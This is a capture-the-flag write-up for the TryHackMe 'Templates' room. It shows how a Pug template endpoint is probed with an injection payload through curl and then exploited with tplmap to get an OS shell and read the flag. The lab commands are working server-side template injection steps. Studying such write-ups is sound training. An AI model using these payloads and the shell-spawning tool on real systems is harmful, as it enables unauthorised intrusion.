TryHackMe WriteUp: Templates

One9twO
Nov 16, 2022


Here’s a write up for https://tryhackme.com/room/templates

Recon

After starting the machine, as per the instructions, there is a website running on port 5000. In my case:

http://10.10.33.8:5000/

Clicking the Convert to HTML button converts the template to HTML.

To make it easier to visualize the request, I replaced the entire content with ‘aaa’, then opened the web console to capture the request.

It was a POST request to /render with a payload of ‘template=aaa’.

An equivalent curl command is:

# curl -X POST http://10.10.33.8:5000/render -d 'template=aaa'

<html><head></head><body><pre>&lt;x&gt;&lt;/aaa&gt;</pre></body></html>

Exploit

A Google search of ‘pug template injection’ led me to this:

To test if the app is vulnerable to SSTI (which was also a hint under ‘similar content’ in the room description), I have used another curl command:

# curl -X POST http://10.10.33.8:5000/render -d 'template=%23%7B7*7%7D '
<html><head></head><body><pre>&lt;49&gt; &lt;/49&gt;</pre></body></html>

The URL-encoded payload decodes to #{7*7}, Pug’s interpolation syntax (the equivalent of {{ 7*7 }} in other template engines). A vulnerable app evaluates the expression and returns the result of 7*7, as above, instead of echoing the text back.

To exploit, use https://github.com/epinna/tplmap/. Since this is a POST request, you will need a couple more args in the ./tplmap.py command:

./tplmap.py -X POST --engine pug --os-shell -u http://10.10.33.8:5000/render -d 'template=abc'

That dropped me in a shell, and the flag was right there :)

linux $ whoami
user
linux $ ls
app.js
flag.txt
node_modules
package-lock.json
package.json
views
linux $ cat flag.txt
flag{the-hash}
